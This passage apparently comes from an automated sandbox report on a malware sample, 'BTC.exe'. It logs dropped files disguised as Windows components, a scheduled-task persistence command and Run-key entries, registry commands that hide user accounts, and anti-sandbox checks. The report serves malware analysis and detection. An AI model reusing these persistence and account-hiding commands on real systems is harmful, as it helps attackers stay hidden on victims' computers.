Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe | Code function: 16_2_06374CB0 push es; ret 16_2_06374CC0
Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe | Code function: 16_2_06374C90 push es; ret 16_2_06374CA0
Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe | Code function: 16_2_06374CF1 push es; ret 16_2_06374D00
Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe | Code function: 16_2_06374CD0 push es; ret 16_2_06374CE0
Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe | Code function: 16_2_06376CC2 push es; ret 16_2_06376CD0
Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe | Code function: 16_2_06374D10 push es; ret 16_2_06374D20
Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe | Code function: 16_2_06375B80 push es; ret 16_2_06375B90
Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe | Code function: 16_2_06375860 push es; ret 16_2_06375870
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_041C81BB push cs; retf 17_2_041C81CA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_041CF1A0 push eax; retf 17_2_041CF1AE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_041C8230 push cs; retf 17_2_041C81CA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_041C8243 push cs; retf 17_2_041C81CA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_041CBF3B pushad ; retf 17_2_041CBF5A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_041C8B59 push cs; retf 17_2_041C8B5E
Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe | Code function: 21_2_00007FF848F400BD pushad ; iretd 21_2_00007FF848F400C1
Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe | Code function: 26_2_00007FF848F329FA push eax; ret 26_2_00007FF848F329FB
Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe | Code function: 26_2_00007FF848F300BD pushad ; iretd 26_2_00007FF848F300C1
Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe | Code function: 26_2_00007FF848F329CA push eax; ret 26_2_00007FF848F329CB
Source: BTC.exe | Static PE information: section name: .text entropy: 7.998268120908593

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\BTC.exe | File created: C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\Desktop\BTC.exe | File created: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe
Source: C:\Users\user\Desktop\BTC.exe | File created: C:\Users\user\AppData\Roaming\crack.exe
Source: C:\Users\user\Desktop\BTC.exe | File created: C:\Users\user\AppData\Roaming\Window Security.exe
Source: C:\Users\user\AppData\Roaming\Cracked.exe | File created: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe
Source: C:\Users\user\AppData\Roaming\Window Security.exe | File created: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe
Source: C:\Users\user\Desktop\BTC.exe | File created: C:\Users\user\AppData\Roaming\update.exe
Source: C:\Users\user\Desktop\BTC.exe | File created: C:\Users\user\AppData\Roaming\Cracked.exe

Boot Survival

Source: Yara match | File source: 0.2.BTC.exe.2c8fa48.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.Cracked.exe.d80000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.Cracked.exe.310b0a8.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.BTC.exe.2c8fa48.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.Cracked.exe.310b0a8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.2039417306.0000000003101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.2004809524.0000000000D82000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 1716, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: update.exe PID: 1632, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Cracked.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
Source: Yara match | File source: Process Memory Space: Cracked.exe PID: 5524, type: MEMORYSTR
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"'
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Defender Service Host.lnk
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Defender Service Host

Hooking and other Techniques for Hiding and Protection

Source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp | String found in binary or memory: 7New-ItemProperty -Path HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList -Name Durios -PropertyType DWord -Value 0 -Force
Source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp | String found in binary or memory: 5New-ItemProperty -Path HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList -Name Venom -PropertyType DWord -Value 0 -Force
Source: Window Security.exe.0.dr | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: Window Security.exe.0.dr | String found in binary or memory: 7New-ItemProperty -Path HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList -Name Durios -PropertyType DWord -Value 0 -Force
Source: Window Security.exe.0.dr | String found in binary or memory: 5New-ItemProperty -Path HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList -Name Venom -PropertyType DWord -Value 0 -Force
Source: Windows Security.exe.6.dr | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: Windows Security.exe.6.dr | String found in binary or memory: 7New-ItemProperty -Path HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList -Name Durios -PropertyType DWord -Value 0 -Force
Source: Windows Security.exe.6.dr | String found in binary or memory: 5New-ItemProperty -Path HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList -Name Venom -PropertyType DWord -Value 0 -Force
Source: C:\Users\user\AppData\Roaming\Window Security.exe | File opened: C:\Users\user\AppData\Roaming\Window Security.exe:Zone.Identifier read attributes | delete
Source: C:\Users\user\AppData\Roaming\Window Security.exe | File opened: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe:Zone.Identifier read attributes | delete
Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe | File opened: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                            Source: C:\Users\user\Desktop\BTC.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\crack.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Cracked.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\update.exe    Process information set: NOOPENFILEERRORBOX (59 identical entries)
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe    Process information set: NOOPENFILEERRORBOX (62 identical entries)
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe    Process information set: NOOPENFILEERRORBOX (58 identical entries)
                            Source: C:\Windows\System32\cmd.exe    Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            Source: Yara match File source: 0.2.BTC.exe.2c8fa48.3.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 3.0.Cracked.exe.d80000.0.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 3.2.Cracked.exe.310b0a8.1.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 0.2.BTC.exe.2c8fa48.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 3.2.Cracked.exe.310b0a8.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 00000003.00000002.2039417306.0000000003101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara match File source: 00000003.00000000.2004809524.0000000000D82000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara match File source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara match File source: Process Memory Space: svchost.exe PID: 1716, type: MEMORYSTR
                            Source: Yara match File source: Process Memory Space: update.exe PID: 1632, type: MEMORYSTR
                            Source: Yara match File source: C:\Users\user\AppData\Roaming\Cracked.exe, type: DROPPED
                            Source: Yara match File source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPED
                            Source: Yara match File source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe, type: DROPPED
                            Source: Yara match File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                            Source: Yara match File source: Process Memory Space: Cracked.exe PID: 5524, type: MEMORYSTR
                            Source: C:\Users\user\AppData\Roaming\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                            Source: C:\Users\user\AppData\Roaming\update.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                            Source: C:\Users\user\AppData\Roaming\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Roaming\update.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Source: Cracked.exe, 00000003.00000002.2039417306.00000000034AC000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe, 00000003.00000002.2039417306.0000000003051000.00000004.00000800.00020000.00000000.sdmp, Windows Security Health Service.exe, 0000001A.00000002.4466271061.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXE
                            Source: svchost.exe, 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, update.exe, 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, update.exe.0.dr, svchost.exe.0.dr Binary or memory string: SBIEDLL.DLL
                            Source: BTC.exe, 00000000.00000002.2010752692.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe, 00000003.00000002.2039417306.0000000003101000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe, 00000003.00000000.2004809524.0000000000D82000.00000002.00000001.01000000.00000007.sdmp, Cracked.exe.0.dr, Windows Security Health Service.exe.3.dr Binary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE
                            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 10 localhost
                            Source: C:\Users\user\Desktop\BTC.exe Memory allocated: 2990000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\BTC.exe Memory allocated: 1AC50000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\crack.exe Memory allocated: CB0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\crack.exe Memory allocated: 2850000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\crack.exe Memory allocated: 2690000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Cracked.exe Memory allocated: 2E80000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Cracked.exe Memory allocated: 1B050000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 2D10000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 4D10000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\update.exe Memory allocated: 14E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\update.exe Memory allocated: 2F60000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\update.exe Memory allocated: 2D60000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe Memory allocated: 1590000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe Memory allocated: 3180000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe Memory allocated: 2EB0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe Memory allocated: 1840000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe Memory allocated: 1B000000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe Memory allocated: 2490000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe Memory allocated: 24E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe Memory allocated: 44E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe Memory allocated: 12A0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe Memory allocated: 1AEC0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe Memory allocated: 2B00000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe Memory allocated: 2D40000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe Memory allocated: 4E40000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe Memory allocated: 2B30000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe Memory allocated: 1AC90000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe Memory allocated: 750000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe Memory allocated: 1A530000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe Memory allocated: 9F0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe Memory allocated: 1A3B0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe Memory allocated: 8E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe Memory allocated: 1A2E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe Memory allocated: 2860000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe Memory allocated: 2900000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe Memory allocated: 4900000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe Memory allocated: FD0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe Memory allocated: 1AAB0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe Memory allocated: 2540000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe Memory allocated: 27D0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe Memory allocated: 25E0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\BTC.exe  Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\crack.exe  Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Cracked.exe  Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\svchost.exe  Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\svchost.exe  Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\svchost.exe  Thread delayed: delay time: 599881
Source: C:\Users\user\AppData\Roaming\svchost.exe  Thread delayed: delay time: 599750
Source: C:\Users\user\AppData\Roaming\svchost.exe  Thread delayed: delay time: 599594
Source: C:\Users\user\AppData\Roaming\svchost.exe  Thread delayed: delay time: 599079
Source: C:\Users\user\AppData\Roaming\svchost.exe  Thread delayed: delay time: 598922
Source: C:\Users\user\AppData\Roaming\svchost.exe  Thread delayed: delay time: 598813
Source: C:\Users\user\AppData\Roaming\svchost.exe  Thread delayed: delay time: 598688
Source: C:\Users\user\AppData\Roaming\svchost.exe  Thread delayed: delay time: 598563
Source: C:\Users\user\AppData\Roaming\svchost.exe  Thread delayed: delay time: 598450
Source: C:\Users\user\AppData\Roaming\svchost.exe  Thread delayed: delay time: 598329
Source: C:\Users\user\AppData\Roaming\svchost.exe  Thread delayed: delay time: 598204
Source: C:\Users\user\AppData\Roaming\svchost.exe  Thread delayed: delay time: 598089
Source: C:\Users\user\AppData\Roaming\svchost.exe  Thread delayed: delay time: 597969
Source: C:\Users\user\AppData\Roaming\svchost.exe  Thread delayed: delay time: 597844
Source: C:\Users\user\AppData\Roaming\svchost.exe  Thread delayed: delay time: 597730
Source: C:\Users\user\AppData\Roaming\svchost.exe  Thread delayed: delay time: 597610
Source: C:\Users\user\AppData\Roaming\svchost.exe  Thread delayed: delay time: 597485
Source: C:\Users\user\AppData\Roaming\svchost.exe  Thread delayed: delay time: 597360
Source: C:\Users\user\AppData\Roaming\svchost.exe  Thread delayed: delay time: 597235
Source: C:\Users\user\AppData\Roaming\svchost.exe  Thread delayed: delay time: 597098
Source: C:\Users\user\AppData\Roaming\svchost.exe  Thread delayed: delay time: 596969
Source: C:\Users\user\AppData\Roaming\svchost.exe  Thread delayed: delay time: 596844
Source: C:\Users\user\AppData\Roaming\svchost.exe  Thread delayed: delay time: 596734
Source: C:\Users\user\AppData\Roaming\svchost.exe  Thread delayed: delay time: 596625
Source: C:\Users\user\AppData\Roaming\svchost.exe  Thread delayed: delay time: 596516
Source: C:\Users\user\AppData\Roaming\svchost.exe  Thread delayed: delay time: 596407
Source: C:\Users\user\AppData\Roaming\svchost.exe  Thread delayed: delay time: 596282
Source: C:\Users\user\AppData\Roaming\svchost.exe  Thread delayed: delay time: 596157
Source: C:\Users\user\AppData\Roaming\svchost.exe  Thread delayed: delay time: 596032
Source: C:\Users\user\AppData\Roaming\svchost.exe  Thread delayed: delay time: 595922
Source: C:\Users\user\AppData\Roaming\svchost.exe  Thread delayed: delay time: 595808
Source: C:\Users\user\AppData\Roaming\svchost.exe  Thread delayed: delay time: 595657
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 599869
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 599737
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 599578
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 599156
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 598922
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 598813
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 598682
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 598563
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 598453
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 598344
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 598219
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 598109
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 598000
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 597891
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 597775
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 597656
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 597547
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 597438
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 597313
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 597188
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 597052
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 596922
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 596812
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 596703
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 596594
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 596484
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 596375
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 596266
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 596154
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 596047
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 595937
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 595811
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 595687
